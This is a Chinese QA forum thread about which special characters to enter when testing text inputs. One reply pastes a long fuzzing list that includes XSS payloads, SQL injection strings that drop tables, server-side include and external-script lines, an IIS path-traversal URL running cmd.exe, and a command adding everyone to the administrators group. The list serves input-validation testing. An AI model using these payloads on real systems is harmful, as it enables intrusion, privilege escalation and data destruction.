测试文本输入时常用到的特殊字符有哪些？

kevinll

测试文本输入时常用到的特殊字符有哪些？我想到了：_user,
test_user_,
‘user’,
“user123\~!@#$%^&*()_+/?|{[,
Test user,
User,
&nbsp,
还有哪些呢？

wuhuawu09

有-(连字符和"_"在一个键上),……（省略号）还有中文状态下的标点、特殊字符（—，￥，）、括号（大，中，小）、、（顿号）等

kevinll

thx!

yangkinki

~!`@#$%^&*()_+|[]-=\{};':"<>?,./～！·＃￥％…＆＊（）—＋｜｀－＝、［］｛｝；‘：“，。／《》？ 这些都属于特殊字符

小南

MSFT%22>document.write(%22This%20page%20has%20the%20HTML%20security%20bug!%22);document.close();
<TABLE><TR><TD>column 1 row 1</TD></TR></TABLE>
%3CTABLE><TR><TD>column 1 row 1</TD></TR></TABLE>
&#x3CTABLE><TR><TD>column 1 row 1</TD></TR></TABLE>
%3CTABLE%3E%3CTR%3E%3CTD%3Ecolumn%201%20row%201%3C%2FTD%3E%3C%2FTR%3E%3C%2FTABLE%3E
<img src=javascript:alert(document.domain)>
<img src%3Djavascript:alert(document.domain)>
TABLE><TR><TD>column 1 row 1</TD><%2FTR>/TABLE>
TABLE><TR><TD>column 1 row 1</TD></TR></TABLE
TABLE><TR><TD>column 1 row 1</TD></TR></TABLE>
<TABLE><TR><TD>column 1 row 1</TD></TR></TABLE
%25%33%43TABLE><TR><TD>column 1 row 1</TD></TR></TABLE>
<!--# include virtual="http://matrixsrv4/testhack/test.inc" -->
%3C%21%2D%2D%23%20include%20virtual%3D%22http%3A%2F%2Fmatrixsrv4%2Ftesthack%2Ftest%2Einc%22%20%2D%2D%3e
<!--%23 include virtual="http://matrixsrv4/testhack/test.inc" -->
<!--# include virtual="http://matrixsrv4/testhack/test.inc
%23 include virtual="http://matrixsrv4/testhack/test.inc -->
<%@ Language=VBScript %
<%@ Language=VBScript %>
&#x3C%25@ Language=VBScript %>
&#x3C%25@ Language=VBScript %
%25%33%43%@ Language%25%33%44VBScript %>
<script language="Javascript" src="http://map.geoup.com/geoup"></script>
<script language="Javascript" src="http://map.geoup.com/geoup"><script>
script language="Javascript" src="http://map.geoup.com/geoup"></script>
<script language="Javascript" src="http://map.geoup.com/geoup"></script
%3Cscript%20language="Javascript" src="http://map.geoup.com/geoup"></script>
%3Cscript%20language="Javascript" src="http://map.geoup.com/geoup"></script
MsgBox "U R Hacked"
%25%33%43script language="Javascript" src="http://map.geoup.com/geoup"></script>
%25%33%43script language="Javascript" src="http://map.geoup.com/geoup"></script
%25%3343script language="Javascript" src="http://map.geoup.com/geoup"></script
set path=c:\hacked
http://%computername%/scripts/..%c0%af../winnt/system32/cmd.exe net stop w3csvc
%22C:%5CDocuments%20and%20Settings%5C%25username%25%5CDesktop%5Chak.bat%22
net localgroup administrators everyone /add %3E c:\addadmin.log
Sql’’INSERT INTO database.tablename1 (column names) SELECT * FROM database.tablename2 --
Sql’’INSERT INTO database.tablename (column name, column name) '980832','yatta yatta' --
Sql’’CREATE database.tablename (table element list) --
Sql’’DROP TABLE database.tablename --
Sql’’DROP VIEW database.view --
Sql’’DROP PROCEDURE database.procedure --
Sql’’UPDATE database.tablename SET columnname = 0 --
<!-- Body --> <!ELEMENT body    (tu*) > <!-- No attributes  -->
%3C%21-- Body --> <!ELEMENT body    (tu*) > <!-- No attributes  -->
<!-- Body -- <!ELEMENT body    (tu*) > <!-- No attributes  -->
!-- Body --> <!ELEMENT body    (tu*) > <!-- No attributes  -->
<!-- Body --> <!ELEMENT body    (tu*) > <!-- No attributes  --
<!-- Body -- <!ELEMENT body    (tu*) > %3C!-- No attributes  --%3E
%25%33%43%2521-- Body --> <!ELEMENT body    (tu*) > <!-- No attributes  -->
%3C%21%2D%2D%20Body%20%2D%2D%3E%20%3C%21ELEMENT%20body%20%20%20%20%28tu%2A%29%20%3E%20%3C%21%2D%2D%20No%20attributes%20%2D%2D%3E
%21%2D%2D%20Body%20%2D%2D%3E%20%3C%21ELEMENT%20body%20%20%20%20%28tu%2A%29%20%3E%20%3C%21%2D%2D%20No%20attributes%20%2D%2D%3E
%3C%21%2D%2D%20Body%20%2D%2D%3E%20%3C%21ELEMENT%20body%20%20%20%20%28tu%2A%29%20%3E%20%3C%21%2D%2D%20No%20attributes%20%2D%2D
0xF900 0xFFFE
&#x3C!-- Body --> <!ELEMENT body    (tu*) > <!-- No attributes  -->
&lt!-- Body --&gt &lt!ELEMENT body    (tu*) &gt &lt!-- No attributes  --&gt
#
0.23
:
%3A
\
%5C
?
%3F
*
%2A
<&nbsp;
%3C
>&nbsp;
%3E
%
0.25
/
%2F
|
%7C
"
0.22
~
%7E
lbot~/%2f?url%26
http://www:microsoft.com
http%3A%2F%2Fwww%2Emicrosoft%2Ecom
http%25%33%41%25%32%46%25%32%46www%25%32%45microsoft%25%32%45com
ftp://(enter valid address)
ftp%3A%2F%2F(enter valid address)
ftp%25%33%41%25%32%46%25%32%46(enter valid address)
file://C:\WINNT\system32\inetsrv\iisadmin\default.asp
file%3A%2F%2FC%3A%5CWINNT%5Csystem32%5Cinetsrv%5Ciisadmin%5Cdefault.asp
file%25%33%41%25%32%46%25%32%46C%25%33%41%25%35%43WINNT%25%35%43system32%25%35%43inetsrv%25%35%43iisadmin%25%35%43default%25%32%45asp
https://(enter valid https address)
http%73%3A%2F%2F(enter valid https address)
http%25%73%25%33%41%25%32%46%25%32%46(enter valid https address)
gopher://(enter valid address)
telnet (enter address)
mailto://aaronspa@microsoft.com
mailto%3A%2F%2Faaronspa%40microsoft%2Ecom
mailto%25%33%41%25%32%46%25%32%46Caaronspa%2540microsoft%25%32%45com
news://(newsgroup)
http:://www.microsoft.com
http%3A%3A%2F%2Fwww%2Emicrosoft%2Ecom
http://www:microsoft.com
http%3A%2F%2Fwww%3Amicrosoft%2Ecom
http:/www.microsoft-com
http%3A%2Fwww%2Emicrosoft%2Dcom
http//microsoft.com
http%2F%2Fmicrosoft%2Ecom
http://.microsoft.com
http%3A%2F%2F%2Emicrosoft%2Ecom
http://microsoft..com
http%3A%2F%2Fmicrosoft%2E%2Ecom
file://C::\WINNT\system32\inetsrv\iisadmin\defaul.aspt
file://C:\WINNT\system32\inetsrv\iisadmin\defaul.text
file://C:\WINNT\system32\inetsrv\..\iisadmin\defaul.asp
\b
%5C%62
\f
%5C%66
\n
%5C%6E
\r
%5C%72
\t
%5C%74
\'
%5C%27
\"
%5C%22
break
return:
delete
strcopy
&copy;
&reg;
™
Dáta
&pound;
&yen;
₣
&iexcl;
ﻼ
;
%3B

loveryanli

所有涉及Sybase数据库Query的时候，输入',必定报错，屡试不爽，呵呵

kevinll

小南 :不太明白你的意思

wuhuawu09

也许 小南 是告诉你各种语言用到的字符(包括数据库用到的语句)和其它转意字符吧

nightbossa

谢谢小南.收藏先...

getfly

所有涉及Sybase数据库Query的时候，输入',必定报错，屡试不爽.
这句话太对了，我以前怎么就没有发现这个符号有这么大的用处呢

zhang1987yuan

俺是新手，可是我觉得特殊字符的输入是不是要按不同的要求划分开啊 ？？比如用户名的输入和日期的输入。